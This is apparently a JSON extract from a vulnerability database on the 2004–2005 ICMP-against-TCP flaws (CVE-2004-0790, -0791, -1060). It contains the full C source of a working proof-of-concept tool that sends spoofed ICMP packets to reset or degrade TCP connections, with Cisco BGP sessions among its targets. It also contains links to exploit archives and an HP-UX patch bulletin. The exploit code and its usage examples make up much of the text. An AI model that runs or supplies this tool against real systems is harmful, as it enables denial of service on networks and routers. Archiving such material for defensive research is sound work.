10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-20T00:00:00", "id": "EXPLOITPACK:CA67AC8E4BC50B223150F812C934C82E", "href": "", "sourceData": "/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\n*\n* Copyright (c) 2004-2005 houseofdabus.\n*\n* (MS05-019) (CISCO:20050412)\n* ICMP attacks against TCP (Proof-of-Concept)\n*\n*\n*\n* .::[ houseofdabus ]::.\n*\n*\n*\n* [ for more details:\n* [ http://www.livejournal.com/users/houseofdabus\n* ---------------------------------------------------------------------\n* Systems Affected:\n* - Cisco Content Services Switch 11000 Series (WebNS)\n* - Cisco Global Site Selector (GSS) 4480 1.x\n* - Cisco IOS 10.x\n* - Cisco IOS 11.x\n* - Cisco IOS 12.x\n* - Cisco IOS R11.x\n* - Cisco IOS R12.x\n* - Cisco IOS XR (CRS-1) 3.x\n* - Cisco ONS 15000 Series\n* - Cisco PIX 6.x\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\n* - AIX 5.x\n* - Windows Server 2003\n* - Windows XP SP2\n* - Windows XP SP1\n* - Windows 2000 SP4\n* - Windows 2000 SP3\n* ...\n*\n* ---------------------------------------------------------------------\n* Description:\n* A denial of service vulnerability exists that could allow an\n* attacker to send a specially crafted Internet Control Message\n* Protocol (ICMP) message to an affected system. An attacker who\n* successfully exploited this vulnerability could cause the affected\n* system to reset existing TCP connections, reduce the throughput\n* in existing TCP connections, or consume large amounts of CPU and\n* memory resources.\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\n*\n* ---------------------------------------------------------------------\n* Solution:\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\n*\n* Other References:\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\n* http://www.kb.cert.org/vuls/id/222750\n*\n* ---------------------------------------------------------------------\n* Tested on:\n* - Windows Server 2003\n* - Windows XP SP1\n* - Windows 2000 SP4\n* - Cisco IOS 11.x\n*\n* ---------------------------------------------------------------------\n* Compile:\n*\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n*\n* ---------------------------------------------------------------------\n* Examples:\n*\n* client <---> router <---> router <---> server\n*\n* CLIENT <---> SERVER\n*\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\n* (abort the connection)\n*\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\n* (slow down the transmission rate for traffic)\n*\n*\n* ROUTER1 <---> ROUTER2\n*\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\n* (DoS Cisco BGP Connections)\n*\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\n* (slow down the transmission rate for traffic)\n*\n* ---------------------------------------------------------------------\n*\n* This is provided as proof-of-concept code only for educational\n* purposes and testing by authorized individuals with permission\n* to do so.\n*\n*/\n\n/* #define _WIN32 */\n\n#ifdef _WIN32\n#pragma comment(lib,\"ws2_32\")\n#pragma pack(1)\n#define WIN32_LEAN_AND_MEAN\n#include <winsock2.h>\n/* IP_HDRINCL */\n#include <ws2tcpip.h>\n\n#else\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <arpa/inet.h>\n#include <netdb.h>\n#include <sys/timeb.h>\n#endif\n\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n\n#define MAX_PACKET 4096\n\n#define DEFAULT_PORT 80\n#define DEFAULT_IP \"192.168.0.1\"\n#define DEFAULT_COUNT 1\n\n/* Define the IP header */\ntypedef struct ip_hdr {\n unsigned char ip_verlen; /* IP version & length */\n unsigned char ip_tos; /* IP type of service */\n unsigned short ip_totallength; /* Total length */\n unsigned short ip_id; /* Unique identifier */\n unsigned short ip_offset; /* Fragment offset field */\n unsigned char ip_ttl; /* Time to live */\n unsigned char ip_protocol; /* Protocol */\n unsigned short ip_checksum; /* IP checksum */\n unsigned int ip_srcaddr; /* Source address */\n unsigned int ip_destaddr; /* Destination address */\n} IP_HDR, *PIP_HDR;\n\n/* Define the ICMP header */\n/* Destination Unreachable Message */\ntypedef struct icmp_hdr {\n unsigned char type; /* Type */\n unsigned char code; /* Code */\n unsigned short checksum; /* Checksum */\n unsigned long unused; /* Unused */\n} ICMP_HDR, *PICMP_HDR;\n\n/* 64 bits of Original Data Datagram (TCP header) */\nchar msg[] =\n\"\\x00\\x50\" /* Source port */\n\"\\x00\\x50\" /* Destination port */\n\"\\x23\\x48\\x4f\\x44\";\n\n/* globals */\nunsigned long dwToIP, /* IP to send to */\n dwFromIP; /* IP to send from (spoof) */\nunsigned short iToPort, /* Port to send to */\n iFromPort; /* Port to send from (spoof) */\nunsigned long dwCount; /* Number of times to send */\nunsigned long Attack;\n\nvoid\nusage(char *progname) {\n printf(\"Usage:\\n\\n\");\n printf(\"%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n\", progname);\n printf(\" -fi:IP From (sender) IP address\\n\");\n printf(\" -ti:IP To (target) IP address\\n\");\n printf(\" -fp:int Target open TCP port number\\n\");\n printf(\" (for example - 21, 25, 80)\\n\");\n printf(\" -tp:int Inicial value for bruteforce (sender) TCP port number\\n\");\n printf(\" (default: 0 = range of ports 0-65535)\\n\");\n printf(\" -n:int Number of packets\\n\\n\");\n printf(\" -a:int ICMP attacks:\\n\");\n printf(\" 1 - Blind connection-reset attack\\n\");\n printf(\" (ICMP protocol unreachable)\\n\");\n printf(\" 2 - Path MTU discovery attack\\n\");\n printf(\" (slow down the transmission rate)\\n\");\n printf(\" 3 - ICMP Source Quench attack\\n\");\n exit(1);\n}\n\nvoid\nValidateArgs(int argc, char **argv)\n{\n int i;\n\n iToPort = 0;\n iFromPort = DEFAULT_PORT;\n dwToIP = inet_addr(DEFAULT_IP);\n dwFromIP = inet_addr(DEFAULT_IP);\n dwCount = DEFAULT_COUNT;\n Attack = 1;\n\n for (i = 1; i < argc; i++) {\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\n switch (tolower(argv[i][1])) {\n case 'f':\n switch (tolower(argv[i][2])) {\n case 'p':\n if (strlen(argv[i]) > 4)\n iFromPort = atoi(&argv[i][4]);\n break;\n case 'i':\n if (strlen(argv[i]) > 4)\n dwFromIP = inet_addr(&argv[i][4]);\n break;\n default:\n usage(argv[0]);\n break;\n }\n break;\n case 't':\n switch (tolower(argv[i][2])) {\n case 'p':\n if (strlen(argv[i]) > 4)\n iToPort = atoi(&argv[i][4]);\n break;\n case 'i':\n if (strlen(argv[i]) > 4)\n dwToIP = inet_addr(&argv[i][4]);\n break;\n default:\n usage(argv[0]);\n break;\n }\n break;\n case 'n':\n if (strlen(argv[i]) > 3)\n dwCount = atol(&argv[i][3]);\n break;\n case 'a':\n if (strlen(argv[i]) > 3)\n Attack = atol(&argv[i][3]);\n if ((Attack > 3) || (Attack < 1))\n usage(argv[0]);\n break;\n default:\n usage(argv[0]);\n break;\n }\n }\n }\n return;\n}\n\n/* This function calculates the 16-bit one's complement sum */\n/* for the supplied buffer */\nunsigned short\nchecksum(unsigned short *buffer, int size)\n{\n unsigned long cksum = 0;\n\n while (size > 1) {\n cksum += *buffer++;\n size -= sizeof(unsigned short);\n }\n if (size) {\n cksum += *(unsigned char *)buffer;\n }\n cksum = (cksum >> 16) + (cksum & 0xffff);\n cksum += (cksum >>16);\n\n return (unsigned short)(~cksum);\n}\n\nint\nmain(int argc, char **argv)\n{\n\n#ifdef _WIN32\n WSADATA wsd;\n#endif\n int s;\n#ifdef _WIN32\n BOOL bOpt;\n#else\n int bOpt;\n#endif\n struct sockaddr_in remote;\n IP_HDR ipHdr,\n ipHdrInc;\n ICMP_HDR icmpHdr;\n int ret;\n unsigned long i, p;\n unsigned short iTotalSize,\n iIPVersion,\n iIPSize,\n p2,\n cksum = 0;\n char buf[MAX_PACKET],\n *ptr = NULL;\n#ifdef _WIN32\n IN_ADDR addr;\n#else\n struct sockaddr_in addr;\n#endif\n\n printf(\"\\n (MS05-019) (CISCO:20050412)\\n\");\n printf(\" ICMP attacks against TCP (Proof-of-Concept)\\n\\n\");\n printf(\" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n\");\n\n if (argc < 3) usage(argv[0]);\n\n /* Parse command line arguments and print them out */\n ValidateArgs(argc, argv);\n#ifdef _WIN32\n addr.S_un.S_addr = dwFromIP;\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr), iFromPort);\n addr.S_un.S_addr = dwToIP;\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr), iToPort);\n printf(\"[*] Count: %d\\n\", dwCount);\n#else\n addr.sin_addr.s_addr = dwFromIP;\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iFromPort);\n addr.sin_addr.s_addr = dwToIP;\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iToPort);\n printf(\"[*] Count: %d\\n\", dwCount);\n#endif\n\n#ifdef _WIN32\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\n printf(\"[-] WSAStartup() failed: %d\\n\", GetLastError());\n return -1;\n }\n#endif\n /* Creating a raw socket */\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\n#ifdef _WIN32\n if (s == INVALID_SOCKET) {\n#else\n if (s < 0) {\n#endif\n printf(\"[-] socket() failed\\n\");\n return -1;\n }\n\n /* Enable the IP header include option */\n#ifdef _WIN32\n bOpt = TRUE;\n#else\n bOpt = 1;\n#endif\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\n#ifdef _WIN32\n if (ret == SOCKET_ERROR) {\n printf(\"[-] setsockopt(IP_HDRINCL) failed: %d\\n\", WSAGetLastError());\n return -1;\n }\n#endif\n\n /* Initalize the IP header */\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\n\n iIPVersion = 4;\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\n\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\n ipHdr.ip_tos = 0; /* IP type of service */\n /* Total packet len */\n ipHdr.ip_totallength = htons(iTotalSize);\n ipHdr.ip_id = htons(42451); /* Unique identifier */\n ipHdr.ip_offset = 0; /* Fragment offset field */\n ipHdr.ip_ttl = 255; /* Time to live */\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\n ipHdr.ip_checksum = 0; /* IP checksum */\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\n\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\n ipHdrInc.ip_tos = 0; /* IP type of service */\n /* Total packet len */\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\n\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\n ipHdrInc.ip_ttl = 255; /* Time to live */\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\n ipHdrInc.ip_checksum = 0; /* IP checksum */\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\n\n /* Initalize the ICMP header */\n icmpHdr.checksum = 0;\n if (Attack == 1) {\n icmpHdr.type = 3; /* Destination Unreachable Message */\n icmpHdr.code = 2; /* protocol unreachable */\n icmpHdr.unused = 0;\n } else if (Attack == 2) {\n icmpHdr.type = 3; /* Destination Unreachable Message */\n icmpHdr.code = 4; /* fragmentation needed and DF set */\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\n } else {\n icmpHdr.type = 4; /* Source Quench Message */\n icmpHdr.code = 0;\n icmpHdr.unused = 0;\n }\n\n memset(buf, 0, MAX_PACKET);\n ptr = buf;\n\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\n memcpy(ptr, msg, sizeof(msg)-1);\n iFromPort = htons(iFromPort);\n memcpy(ptr, &iFromPort, 2);\n\n remote.sin_family = AF_INET;\n remote.sin_port = htons(iToPort);\n remote.sin_addr.s_addr = dwToIP;\n\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\n\n cksum = checksum((unsigned short *)&ipHdr, 20);\n memcpy(buf+10, &cksum, 2);\n\n for (p = iToPort; p <= 65535; p++) {\n p2 = htons((short)p);\n memcpy((char *)(ptr+2), &p2, 2);\n buf[22] = 0;\n buf[23] = 0;\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\n memcpy(buf+20+2, &cksum, 2);\n\n for (i = 0; i < dwCount; i++) {\n#ifdef _WIN32\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\n sizeof(remote));\n#else\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\n sizeof(remote));\n#endif\n#ifdef _WIN32\n if (ret == SOCKET_ERROR) {\n#else\n if (ret < 0) {\n#endif\n printf(\"[-] sendto() failed\\n\");\n break;\n }\n }\n }\n\n#ifdef _WIN32\n closesocket(s);\n WSACleanup();\n#endif\n\n return 0;\n}\n\n// milw0rm.com [2005-04-20]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EXPLOITPACK:71B747534955EA3973CCD9599C63F9C6", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\n\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n\nThe following individual attacks are reported:\n\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\n\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n\n**Update: Microsoft platforms are also reported prone to these issues. \n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EXPLOITPACK:E702ACBD662B14AAF4EE4BDC14AB8BA9", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\n \nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n \nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n \nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n \nThe following individual attacks are reported:\n \n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n \nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n \n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n**Update: Microsoft platforms are also reported prone to these issues. \n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c00576017\r\nVersion: 8\r\n\r\nHPSBUX01164 SSRT4884 HP-UX TCP/IP Remote Denial of Service &#40;DoS&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted\r\nupon as soon as possible.\r\n\r\nRelease Date: 2005-05-25\r\nLast Updated: 2005-12-06\r\n\r\nPotential Security Impact: Remote Denial of Service &#40;DoS&#41;\r\n\r\nSource: Hewlett-Packard Company,\r\n HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\n\r\nA potential security vulnerability has been identified with HP-UX\r\nrunning TCP/IP. This vulnerability could be remotely exploited by\r\nan unauthorized user to cause a Denial of Service&#40;DoS&#41;.\r\n\r\nReferences: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791,\r\n CAN-2004-1060\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP.\r\nHP-UX B.11.11 and B.11.23 running TOUR &#40;Transport Optional Upgrade\r\nRelease&#41;.\r\n\r\nBACKGROUND\r\n\r\nAs reported in NISCC VU#532967:\r\nhttp://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html?lang=en\r\nICMP messages may be used to attack TCP/IP connections.\r\n\r\nThere are three issues reported in NISCC VU#532967:\r\n\r\nCVE number: CAN-2004-0790\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790\r\n\r\nCVE number: CAN-2004-0791\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791\r\n\r\nCVE number: CAN-2004-1060\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060\r\n\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.00\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33395, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.04\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33427, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.11\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33159, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.22\r\n=============\r\nNetworking.NET2-KRN\r\naction: install binary files, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.23\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_32606, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.11\r\nHP-UX B.11.23\r\n=============\r\nTOUR_PRODUCT.T-NET2-KRN\r\n -&gt;action: install revision A.03.00, optionally set\r\n ip_pmtu_strategy=0\r\n\r\nEND AFFECTED VERSIONS\r\nRESOLUTION\r\n\r\nHP has made the following patches, updates, and binary\r\nfiles available to resolve the issue.\r\n\r\nPatches are available for the core network product from\r\nhttp://itrc.hp.com :\r\n\r\nB.11.00 PHNE_33395 or subsequent\r\n\r\nB.11.04 PHNE_33427 or subsequent\r\n\r\nB.11.11 PHNE_33159 or subsequent\r\n\r\nB.11.23 PHNE_32606 or subsequent\r\n\r\n\r\n -&gt;TOUR revision 3.0 is available from:\r\n -&gt;http://www.hp.com/go/softwaredepot\r\n\r\n -&gt;Binary files are available for B.11.22. Please write to\r\n -&gt;security-alert@hp.com for more information.\r\n\r\nOptionally set ip_pmtu_strategy=0 to work around CAN-2004-1060.\r\nHowever, this may not be necessary:\r\n\r\nAlthough changes in the binary files and patches for CAN-2004-0790\r\nand CAN-2004-0791 do not prevent the exploit of CAN-2004-1060,\r\nthey do make it less likely to succeed. The sequence number check\r\nsuggested in section 5.1 of &#39;ICMP attacks against TCP&#39; has been\r\nimplemented. The Internet Draft of &#39;ICMP attacks against TCP&#39; can\r\nbe found here:\r\nhttp://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\nCustomers should consider whether this check reduces the risk of\r\nthe exploit to the point that setting ip_pmtu_strategy=0 is not\r\nrequired.\r\n\r\nNote: ip_pmtu_strategy=0 sets the PMTU to 576 bytes and clears the\r\n&quot;Don&#39;t Fragment&quot; bit. This disables PMTU discovery. For IPv4 the\r\nNext-Hop MTU may be as low as 68 bytes. Therefore setting\r\nip_pmtu_strategy=0 may cause performance to decrease.\r\n\r\nTo set ip_pmtu_strategy=0:\r\n\r\nEdit /etc/rc.config.d/nddconf to add the following:\r\n\r\nTRANSPORT_NAME[n]=ip\r\nNDD_NAME[n]=ip_pmtu_strategy\r\nNDD_VALUE[n]=0\r\n\r\nwhere &#39;n&#39; is the next available index value as described in the\r\nnddconf comments.\r\n\r\nThis value will take effect when the system is rebooted.\r\nUntil the system can be rebooted use the following command to read\r\nthe /etc/rc.config.d/nddconf file and set the tunable parameters:\r\n/usr/bin/ndd -c\r\n\r\nThe ip_pmtu_strategy parameter can be displayed by the following\r\ncommand:\r\n/usr/bin/ndd -get /dev/ip ip_pmtu_strategy\r\n\r\nNote: Since open connections will remain potentially vulnerable\r\nuntil they are closed and certain internal data structures are\r\nreleased it is recommended that the system be rebooted.\r\n\r\nNote: There is a defect that will cause &quot;ndd -c&quot; to fail if there\r\nare more than 10 directives in /etc/rc.config.d/nddconf. That\r\ndefect is fixed in the following patches:\r\n\r\nB.11.11 PHNE_25644 or subsequent\r\n\r\nB.11.04 PHNE_26076 or subsequent\r\n\r\nB.11.00 PHNE_26125 or subsequent\r\n\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nOptionally set ip_pmtu_strategy=0\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Security Patch Check: Security Patch Check revision B.02.00\r\nanalyzes all HP-issued Security Bulletins to provide a subset of\r\nrecommended actions that potentially affect a specific HP-UX\r\nsystem. For more information:\r\nhttp://software.hp.com/portal/swdepot/displayProductInfo.do?\r\nproductNumber=B6834AA\r\n\r\nUPDATE HISTORY\r\nInitial release: 25 May 2005\r\nUpdate 1: 1 June 2005 Binary files for B.11.00 and B.11.22 are\r\n available.\r\nUpdate 2: 19 June 2005 Added TOUR information.\r\nUpdate 3: 27 June 2005 PHNE_33159 is available for B.11.11.\r\nUpdate 4: 10 July 2005 PHNE_32606 is available for B.11.23.\r\nUpdate 5: 24 July 2005 PHNE_33395 is available for B.11.00.\r\nUpdate 6: 15 August 2005 PHNE_33427 is available for B.11.04.\r\n\r\n\r\nSupport: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nReport: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To get the security-alert PGP key, please send an\r\ne-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;\r\nlangcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page:\r\n Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page:\r\n Subscriber&#39;s Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters of the\r\nBulletin number in the title:\r\n\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing &amp; Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user&#39;s use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\n\r\n&#40;c&#41;Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided &quot;as is&quot; without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQ5bhOOAfOvwtKn1ZEQKzSgCg1iC5rsS3fg+NdLRiEgXs1RLFHtMAoI8f\r\n7aOaCbh4wQ3lzcx/PDVZn5Cz\r\n=wJMN\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2005-12-08T00:00:00", "title": "[security bulletin] SSRT4884 HP-UX TCP/IP Remote Denial of Service 